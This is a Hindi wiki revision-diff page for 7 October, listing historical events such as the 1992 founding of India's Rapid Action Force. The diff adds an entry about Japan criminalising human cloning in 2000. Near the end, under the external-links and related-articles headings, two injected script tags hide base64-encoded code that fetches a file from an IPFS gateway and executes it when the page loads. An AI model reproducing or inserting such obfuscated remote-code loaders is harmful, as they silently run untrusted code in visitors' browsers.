Difference between revisions of "7 अक्टूबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
* [[1992]] - [[भारत]] में त्वरित कार्यवाइ बल का गठन किया गया था। इसका गठन विशेष रूप से सांप्रदायिक दंगों से सहानुभूति पूर्वक और विशेषज्ञतापूर्वक निबटने के लिए हुआ था। प्रकृतिक आपदाओं से निबटने में भी यह बल नागरिक प्रशासन की मदद करता है।
 
* [[1992]] - [[भारत]] में त्वरित कार्यवाइ बल का गठन किया गया था। इसका गठन विशेष रूप से सांप्रदायिक दंगों से सहानुभूति पूर्वक और विशेषज्ञतापूर्वक निबटने के लिए हुआ था। प्रकृतिक आपदाओं से निबटने में भी यह बल नागरिक प्रशासन की मदद करता है।
 
* [[1997]] - सूर्य बहादुर थापा द्वारा नेपाल के नये प्रधानमंत्री के रूप में शपथ ग्रहण, भारत और रूस सुरक्षा सहयोग 2010 तक बढ़ाने के लिए सहमत।  
 
* [[1997]] - सूर्य बहादुर थापा द्वारा नेपाल के नये प्रधानमंत्री के रूप में शपथ ग्रहण, भारत और रूस सुरक्षा सहयोग 2010 तक बढ़ाने के लिए सहमत।  
 +
* [[2000]] - [[जापान]] में मानव क्लोनिंग दंडनीय अपराध घोषित।
 
* [[2008]] - फलस्तीन के राष्ट्रपति महमूद अब्बास चार दिन की राजकीया यात्रा पर [[भारत]] पहुँचे।  
 
* [[2008]] - फलस्तीन के राष्ट्रपति महमूद अब्बास चार दिन की राजकीया यात्रा पर [[भारत]] पहुँचे।  
 
==7 अक्टूबर को जन्मे व्यक्ति==
 
==7 अक्टूबर को जन्मे व्यक्ति==

Revision as of 08:09, 9 February 2012


gregori kailandar ke anusar 7 aktoobar varsh ka 280 vaan (lip varsh mean yah 281 vaan) din hai. sal mean abhi aur 85 din shesh haian.

7 aktoobar ki mahattvapoorn ghatanaean

  • 1950 - madar teresa ne kolakata mean mishanarij aauf chairiti ki sthapana ki thi.
  • 1992 - bharat mean tvarit karyavai bal ka gathan kiya gaya tha. isaka gathan vishesh roop se saanpradayik dangoan se sahanubhooti poorvak aur visheshajnatapoorvak nibatane ke lie hua tha. prakritik apadaoan se nibatane mean bhi yah bal nagarik prashasan ki madad karata hai.
  • 1997 - soory bahadur thapa dvara nepal ke naye pradhanamantri ke roop mean shapath grahan, bharat aur roos suraksha sahayog 2010 tak badhane ke lie sahamat.
  • 2000 - japan mean manav kloniang dandaniy aparadh ghoshit.
  • 2008 - phalastin ke rashtrapati mahamood abbas char din ki rajakiya yatra par bharat pahuanche.

7 aktoobar ko janme vyakti

7 aktoobar ko hue nidhan

7 aktoobar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>